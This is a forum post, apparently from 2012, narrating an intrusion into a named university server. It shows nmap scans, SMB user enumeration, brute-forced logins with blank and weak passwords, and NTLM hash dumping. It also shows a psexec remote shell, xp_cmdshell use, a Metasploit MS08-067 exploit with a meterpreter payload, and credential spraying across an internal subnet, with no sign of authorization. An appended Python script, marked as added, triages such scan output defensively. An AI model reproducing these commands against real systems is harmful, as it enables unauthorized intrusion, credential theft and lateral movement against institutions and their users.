China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: nmap+msf intrusion into Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46
Guangxi Normal University website: http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241   // use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan results

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241   // view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241   // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // in msf, exploit the ms08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254   // use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
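An added example, not part of the original post: a Python triage script that parses the kind of NSE host-script output shown above (smb-enum-shares, smb-brute, smb-check-vulns), grades each exposure, pairs it with the fix a defender would apply, and flags a login that succeeds on more than one host, which is what the final subnet sweep relies on. The sample output, severity labels and fix strings are constructed here from the post's values, not emitted by nmap.

```python
import re
# Constructed sample (values from the post): host-script blocks of the three NSE scripts, plus the sweep's second host.
SAMPLE = """\
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap scan report for 192.168.1.105
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
"""
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?$")
SCRIPT_RE = re.compile(r"^\| ([\w-]+):$")          # script header, e.g. "| smb-brute:"
LOGIN_RE = re.compile(r"^([^:]+):(.*) => Login was successful$")

def parse_host_scripts(text):
    """Return {host: {script: [body lines]}}; the '|' / '|_' prefixes are dropped."""
    out, host, script = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
        elif host and (m := SCRIPT_RE.match(line)):
            script = m.group(1)
        elif host and script and line.startswith("|"):
            out.setdefault(host, {}).setdefault(script, []).append(line.lstrip("|_").strip())
    return out

def assess(results):
    """Grade each exposure and pair it with the fix a defender would apply."""
    findings, creds, share = [], {}, None
    for host, scripts in results.items():
        for body in scripts.get("smb-enum-shares", []):
            if not body.startswith("Anonymous access:"):
                share = body                       # the share name precedes its access line
            elif (level := body.split(":", 1)[1].strip()) != "<none>":
                findings.append((host, "HIGH", f"{share} anonymous {level}", "restrict null sessions"))
        for body in scripts.get("smb-brute", []):
            if m := LOGIN_RE.match(body):
                creds.setdefault(m.groups(), set()).add(host)
                findings.append((host, "CRITICAL" if m[2] == "<blank>" else "HIGH", f"{m[1]} password {m[2]}", "strong password + lockout policy"))
        for body in scripts.get("smb-check-vulns", []):
            vid, _, state = body.partition(":")
            if state.strip() == "VULNERABLE":
                findings.append((host, "CRITICAL", f"{vid} unpatched", "apply vendor patch"))
    for (user, pw), hosts in creds.items():        # one login valid on many hosts = lateral movement
        if len(hosts) > 1:
            findings.append(("*", "CRITICAL", f"{user}:{pw} reused on {len(hosts)} hosts", "unique local admin passwords"))
    return findings
```

Run it as `python3 triage.py` after adding a loop that prints `assess(parse_host_scripts(SAMPLE))`, or feed it the normal output of a real scan with `open(path).read()` in place of SAMPLE.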





Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2